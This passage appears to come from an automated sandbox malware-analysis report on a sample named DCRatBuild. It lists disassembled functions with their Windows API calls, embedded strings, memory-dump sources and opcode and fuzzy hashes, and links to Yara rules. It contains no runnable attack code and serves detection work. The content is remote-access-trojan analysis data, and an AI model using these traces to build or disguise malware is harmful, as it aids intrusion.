                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                        • String ID: $%s:$CAPTION$d$tL
                                                                                                                        • API String ID: 2407758923-2975994708
                                                                                                                        • Opcode ID: e2f603fb7a61f376f425a9394ce57bfcc06ecd810f7b1274e6a1cc1dcf8c5d79
                                                                                                                        • Instruction ID: f9fa62e68e9a5e052acd76616176d7410742747162669d9c3c18d91f12392e6c
                                                                                                                        • Opcode Fuzzy Hash: e2f603fb7a61f376f425a9394ce57bfcc06ecd810f7b1274e6a1cc1dcf8c5d79
                                                                                                                        • Instruction Fuzzy Hash: B481AF72208301AFD710DFA9CD89E6BBBE9EBC9714F04092EFA8497250D735E905CB56
                                                                                                                        Function 004BCB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 004BCB66
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC71E
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC730
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC742
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC754
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC766
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC778
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC78A
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC79C
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7AE
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7C0
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7D2
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7E4
                                                                                                                          • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7F6
                                                                                                                        • _free.LIBCMT ref: 004BCB5B
                                                                                                                          • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
                                                                                                                          • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
                                                                                                                        • _free.LIBCMT ref: 004BCB7D
                                                                                                                        • _free.LIBCMT ref: 004BCB92
                                                                                                                        • _free.LIBCMT ref: 004BCB9D
                                                                                                                        • _free.LIBCMT ref: 004BCBBF
                                                                                                                        • _free.LIBCMT ref: 004BCBD2
                                                                                                                        • _free.LIBCMT ref: 004BCBE0
                                                                                                                        • _free.LIBCMT ref: 004BCBEB
                                                                                                                        • _free.LIBCMT ref: 004BCC23
                                                                                                                        • _free.LIBCMT ref: 004BCC2A
                                                                                                                        • _free.LIBCMT ref: 004BCC47
                                                                                                                        • _free.LIBCMT ref: 004BCC5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID: hL
                                                                                                                        • API String ID: 161543041-25165468
                                                                                                                        • Opcode ID: e33041f3c70924d879b3baa3536379c41d95839b5e02fcd280c687f92d680464
                                                                                                                        • Instruction ID: 541e7f4dce243329940a65a52f9fae10aa84a7bdf5d85045fce495eb805cf50e
                                                                                                                        • Opcode Fuzzy Hash: e33041f3c70924d879b3baa3536379c41d95839b5e02fcd280c687f92d680464
                                                                                                                        • Instruction Fuzzy Hash: 7D313C316042059FEB21AA3AE8C6BDB77FDAF60314F50542FE148D6291DF39AC40CA38
                                                                                                                        Function 004B96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 004B9705
                                                                                                                          • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
                                                                                                                          • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
                                                                                                                        • _free.LIBCMT ref: 004B9711
                                                                                                                        • _free.LIBCMT ref: 004B971C
                                                                                                                        • _free.LIBCMT ref: 004B9727
                                                                                                                        • _free.LIBCMT ref: 004B9732
                                                                                                                        • _free.LIBCMT ref: 004B973D
                                                                                                                        • _free.LIBCMT ref: 004B9748
                                                                                                                        • _free.LIBCMT ref: 004B9753
                                                                                                                        • _free.LIBCMT ref: 004B975E
                                                                                                                        • _free.LIBCMT ref: 004B976C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID: 0dL
                                                                                                                        • API String ID: 776569668-2781978522
                                                                                                                        • Opcode ID: 450c3c082a28eedb65f018d3b73ed5ada6d1ba96f98b6c21b3de483fe014d7be
                                                                                                                        • Instruction ID: e825dbe8c0d18eaff0c8419d0e0321fbd2610366a2e31d4c87c7526b4e1089f1
                                                                                                                        • Opcode Fuzzy Hash: 450c3c082a28eedb65f018d3b73ed5ada6d1ba96f98b6c21b3de483fe014d7be
                                                                                                                        • Instruction Fuzzy Hash: CD119476110109BFCB01EF55C842DD93BBDAF24354B9154AAFA084B262DE35DE50DFA8
                                                                                                                        Function 004A9711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 004A9736
                                                                                                                        • _wcslen.LIBCMT ref: 004A97D6
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004A97E5
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004A9806
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004A982D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                        • String ID: FjunJ$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                        • API String ID: 1777411235-4029663861
                                                                                                                        • Opcode ID: 21aca03fa7d978f753e00065a2c569133dc10e587e4d3ad81558845b2555da72
                                                                                                                        • Instruction ID: 66333213fad4ec8ea7b62094bf871f2ecd5e8ef1714e407af42edc50dcb569d3
                                                                                                                        • Opcode Fuzzy Hash: 21aca03fa7d978f753e00065a2c569133dc10e587e4d3ad81558845b2555da72
                                                                                                                        • Instruction Fuzzy Hash: 143139361093017AD725AF269C06FAB77989FA3325F14011FF501962D2EB6CDE0482BD
                                                                                                                        Function 004AD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 004AD6C1
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 004AD6ED
                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004AD709
                                                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004AD720
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004AD734
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004AD75D
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004AD764
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 004AD76D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                        • String ID: STATIC
                                                                                                                        • API String ID: 3820355801-1882779555
                                                                                                                        • Opcode ID: 30fbb9c708792692139b87a17e54dac2596f6c44638c4a38f292bf6a57127038
                                                                                                                        • Instruction ID: 077c064d29bfa8b0b70d0f7fa8413f8893578d76fe437dfca8aca125aa1426d2
                                                                                                                        • Opcode Fuzzy Hash: 30fbb9c708792692139b87a17e54dac2596f6c44638c4a38f292bf6a57127038
                                                                                                                        • Instruction Fuzzy Hash: DB1121369003107FE2216F70AC4AFAF765CAF66712F008137FA52A2191DB6C8F5586BD
                                                                                                                        Function 004B2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 322700389-393685449
                                                                                                                        • Opcode ID: c589c5cbf7d2459e6c21458ea0093e53472b299c138abca86df790f16babb742
                                                                                                                        • Instruction ID: 1379d84643e33fe16eca563c45d38c6bbbe7b9f3234e9a9b34ba435edd0943f1
                                                                                                                        • Opcode Fuzzy Hash: c589c5cbf7d2459e6c21458ea0093e53472b299c138abca86df790f16babb742
                                                                                                                        • Instruction Fuzzy Hash: 94B17A31800209EFCF24EFAAC9809EFB7B9BF04315B14455BE8016B312D779DA11DBA9
                                                                                                                        Function 0049AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nJ
                                                                                                                        • API String ID: 3519838083-1706884476
                                                                                                                        • Opcode ID: 6fd99393745f2108e7e214756020f255d2c56ccb0cfecd89cab5977dc4b7e00d
                                                                                                                        • Instruction ID: de9eff2a58cf46400ac25e2f80f667f9bdf6966339ce5fdf79a62b659faf2003
                                                                                                                        • Opcode Fuzzy Hash: 6fd99393745f2108e7e214756020f255d2c56ccb0cfecd89cab5977dc4b7e00d
                                                                                                                        • Instruction Fuzzy Hash: E5718F70A00219AFDF14DF65DC95EAFBBB9FF49315B10416EE412A72A0CB346D01CBA4
                                                                                                                        Function 00496FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00496FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00497013
                                                                                                                        • _wcslen.LIBCMT ref: 00497084
                                                                                                                          • Part of subcall function 00497A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00497AAB
                                                                                                                          • Part of subcall function 00497A9C: GetLastError.KERNEL32 ref: 00497AF1
                                                                                                                          • Part of subcall function 00497A9C: CloseHandle.KERNEL32(?), ref: 00497B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3122303884-3508440684
                                                                                                                        • Opcode ID: 5718283c9b6b76404b572e1edf8309631123f8e2b0bfca86f75f0c37041548fe
                                                                                                                        • Instruction ID: e7cc9046da5a6549a66165f64bf7b44785c3102e1d38000a0d4e7cb6a79a30f4
                                                                                                                        • Opcode Fuzzy Hash: 5718283c9b6b76404b572e1edf8309631123f8e2b0bfca86f75f0c37041548fe
                                                                                                                        • Instruction Fuzzy Hash: B941D5B1D18344BAEF20EB719C42FEF7B6C9F05308F00446BF955A6282D67CAA448769
                                                                                                                        Function 004AB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AB610
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004AB637
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004AB650
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004AB661
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 004AB66A
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004AB67E
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004AB694
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                        • String ID: LICENSEDLG
                                                                                                                        • API String ID: 3214253823-2177901306
                                                                                                                        • Opcode ID: e485b74a43af8bbce091cd74bec4b991efd18552e0db8418da5d2f71b75c5c74
                                                                                                                        • Instruction ID: b958122a38c631b92119052e764e6ec3d0e40baf4e30e75e9a649ce444c5624e
                                                                                                                        • Opcode Fuzzy Hash: e485b74a43af8bbce091cd74bec4b991efd18552e0db8418da5d2f71b75c5c74
                                                                                                                        • Instruction Fuzzy Hash: 5321F332200204BBE6119F76EC49F7B3B6CFB5BB46F11402AF600965A2CF5A9911D67E
                                                                                                                        Function 004AFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F3417122,00000001,00000000,00000000,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFD99
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFE14
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004AFE1F
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE48
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE52
                                                                                                                        • GetLastError.KERNEL32(80070057,F3417122,00000001,00000000,00000000,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFE57
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE6A
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFE80
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1353541977-0
                                                                                                                        • Opcode ID: 052bec0e05b0d260b9f8c76bdeb9cad6ab3ab4a53860e5673e22f6665b50ffe6
                                                                                                                        • Instruction ID: f663094ad4b940b0da65d73094b12caf6b861f9a1810c86d26ce2d51af9cd563
                                                                                                                        • Opcode Fuzzy Hash: 052bec0e05b0d260b9f8c76bdeb9cad6ab3ab4a53860e5673e22f6665b50ffe6
                                                                                                                        • Instruction Fuzzy Hash: B9410871A00205ABDB109FAACC45FAFBBA8EB55715F10823FF905E7391D738990487A9
                                                                                                                        Function 00499382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00499387
                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004993AA
                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004993C9
                                                                                                                          • Part of subcall function 0049C29A: _wcslen.LIBCMT ref: 0049C2A2
                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        • _swprintf.LIBCMT ref: 00499465
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004994D4
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00499514
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: rtmp%d
                                                                                                                        • API String ID: 3726343395-3303766350
                                                                                                                        • Opcode ID: e13fc6352c1dd129619f5a95fbe3c6fd969387e49bf192141ca014084a976fb4
                                                                                                                        • Instruction ID: 6b90c1e67126b51ede6d6e66b2c22a87d756442aa065c6b25c1e31d864617810
                                                                                                                        • Opcode Fuzzy Hash: e13fc6352c1dd129619f5a95fbe3c6fd969387e49bf192141ca014084a976fb4
                                                                                                                        • Instruction Fuzzy Hash: 2B41827290026475DF21ABA58D45EDF7B7CAF51344F0048BFB609A3151DA3C8F898B68
                                                                                                                        Function 00491100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: UJ$pJ$zJ
                                                                                                                        • API String ID: 176396367-3819926901
                                                                                                                        • Opcode ID: 46629b9dd1f047440097a2e501ace831baf0f1043daa8e573e1ce257b0813df6
                                                                                                                        • Instruction ID: 0175c6f05f9074b2b365f22b94399e20cb0bebdabc673bbc59e210332f01aa40
                                                                                                                        • Opcode Fuzzy Hash: 46629b9dd1f047440097a2e501ace831baf0f1043daa8e573e1ce257b0813df6
                                                                                                                        • Instruction Fuzzy Hash: 2E41C471A0066A5BCB11AF698C059EF7BB8EF01315F00402FF945F7255DE34AE558AA8
                                                                                                                        Function 004A9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
